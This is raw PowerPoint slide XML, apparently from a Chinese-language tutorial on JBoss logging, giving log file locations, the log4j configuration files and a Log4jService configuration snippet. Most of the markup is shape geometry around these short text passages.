                  <a:pt x="9525" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="10399725" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="3544189"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="3549015">
                <a:moveTo>
                  <a:pt x="10409250" y="3544189"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="3544189"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="3539426"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="35441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7111" y="1918716"/>
            <a:ext cx="10400030" cy="368935"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10400030" h="368935">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399776" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399776" y="368807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36880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1689" y="1913864"/>
            <a:ext cx="10409555" cy="379095"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10404487" y="378853"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="378853"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="378612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104092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9328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409021" y="375564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10408348" y="376885"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10407294" y="377939"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10405960" y="378612"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="378853"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="37909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409555" h="379094">
                <a:moveTo>
                  <a:pt x="103997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399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10399725" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10409250" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10404487" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="9525" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10399725" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10399725" y="374091"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="10409555" h="379094">
                <a:moveTo>
                  <a:pt x="10409250" y="374091"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10399725" y="374091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10404487" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="369328"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10409250" y="37409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9851" y="1493431"/>
            <a:ext cx="10526790" cy="4739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jboss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日志路径：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="9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../server/default/log</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="72771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Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>其中</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0"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latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>boot.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是启动日志，</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="90" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-15" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>server.log</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>是包括的启动日志和</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jboss</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>运行的日志。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日志配置文件目录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：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..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/server/default/conf;</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="727710">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1475"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>该目录下可能存在多个日</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>志</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="85" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular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配置文件，如</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>log4j.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jboss-log4j.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件，内容可能都是一样的，但</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jboss-</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7277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service.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>文件里有存放现在使用的哪个日志配置文件，参见以下这段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897255" marR="3942715" indent="-1695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&lt;mbean code="org.jboss.logging.Log4jService"  name="jboss.system:type=Log4jService,service=Logging"  xmbean-dd="resource:xmdesc/Log4jService-xmbean.xml"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11233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&lt;attribute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name="ConfigurationURL"&gt;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resource:jboss-log4j.xml</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/attribute&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1811655" marR="2205990" indent="-68834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&lt;!-- Set the org.apache.log4j.helpers.LogLog.setQuiteMode. As of log4j1.2.8  this needs to be set to avoid a possible deadlock on exception at the  appender level. See bug#696819.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--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11233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&lt;attribute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name="Log4jQuietMode"&gt;</a:t>
            </a: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true</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>&lt;/attribute&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11233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&lt;!-- How frequently in seconds the ConfigurationURL is checked for changes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--&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="11233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&lt;attribute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name="RefreshPeriod"&gt;60&lt;/attribute&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="7277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&lt;/mbean&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1811655">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="10" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>注意：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Noto Sans CJK JP Regular"/>
                <a:cs typeface="Noto Sans CJK JP Regular"/>
              </a:rPr>
              <a:t>红色部分，说明使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>jboss-log4j.xml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5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3035" y="3811270"/>
            <a:ext cx="2379345" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2379345" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2378963" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2378963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10919" cy="284480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1010919" h="284479">
                <a:moveTo>
                  <a:pt x="0" y="284479"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1010412" y="284479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1010412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开启日志功能的方法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010411" y="1790700"/>
            <a:ext cx="8803005" cy="2369820"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8803005" h="2369820">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802624" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802624" y="2369820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="236982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4963" y="1785569"/>
            <a:ext cx="8812530" cy="2379980"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="8807488" y="2379408"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2379408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2379179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2378494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2377440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2376119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2374646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807488" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88122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369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2374646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="2374646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812022" y="2376119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8811348" y="2377440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8810294" y="2378494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8808961" y="2379179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807488" y="2379408"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="237997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812530" h="2379979">
                <a:moveTo>
                  <a:pt x="88027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802725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802725" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="8802725" y="2374646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807488" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807488" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802725" y="2374646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="8812250" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8807488" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802725" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="9525" y="2374646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2374646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="8802725" y="2374646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2374646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802725" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802725" y="2374646"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2379979">
                <a:moveTo>
                  <a:pt x="8812250" y="2374646"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802725" y="2374646"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807488" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="2369883"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812250" y="23746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92376" y="2638194"/>
            <a:ext cx="443230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3369945" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>prefix="localhost_access_log."	su</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-35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fix=".log"</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="8724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pattern="%h %l %u %t %r %s %b"  directory="${jboss.server.home.dir}/log"  resolveHosts="false" /&gt;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5839" y="4317491"/>
            <a:ext cx="8803005" cy="2155190"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8803005" h="2155190">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802624" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802624" y="2154936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="215493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522" y="4312767"/>
            <a:ext cx="8812530" cy="2164080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="8807500" y="2163953"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2163953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="2163724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="2163051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="2161997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="2160663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2159190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="881226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154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2159190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="2159190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812022" y="2160663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8811348" y="2161997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8810294" y="2163051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8808961" y="2163724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807500" y="2163953"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="216407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812530" h="2164079">
                <a:moveTo>
                  <a:pt x="880273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802738" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802738" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="8802738" y="2159190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802738" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807500" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802738" y="2159190"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="8812263" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8807500" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802738" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="9525" y="2159190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2159190"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="8802738" y="2159190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9525" y="2159190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802738" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8802738" y="2159190"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="8812530" h="2164079">
                <a:moveTo>
                  <a:pt x="8812263" y="2159190"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8802738" y="2159190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8807500" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="2154428"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8812263" y="215919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712" y="2663951"/>
            <a:ext cx="7371715" cy="891540"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7371715" h="891539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7371588" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7371588" y="891539"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8915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89" y="2658783"/>
            <a:ext cx="7381875" cy="902335"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="7377010" y="902068"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4762" y="902068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3289" y="901839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1955" y="901166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901" y="900112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="228" y="898778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="897305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7377010" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="738177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92543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4762" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9525" y="897305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="897305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381544" y="898778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7380858" y="900112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7379804" y="901166"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7378484" y="901839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7377010" y="902068"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7381875" h="9023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381875" h="902335">
                <a:moveTo>
                  <a:pt x="737224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372248" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7372248" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="7372248" y="897305"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7372248" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7377010" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7377010" y="892543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7372248" y="897305"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="7381875" h="902335">
                <a:moveTo>
                  <a:pt x="7381773" y="9525"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7377010" y="9525"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7372248" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="4762"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7381773" y="9525"/>
                </a:lnTo>
                <a:close/>
              </a:path>
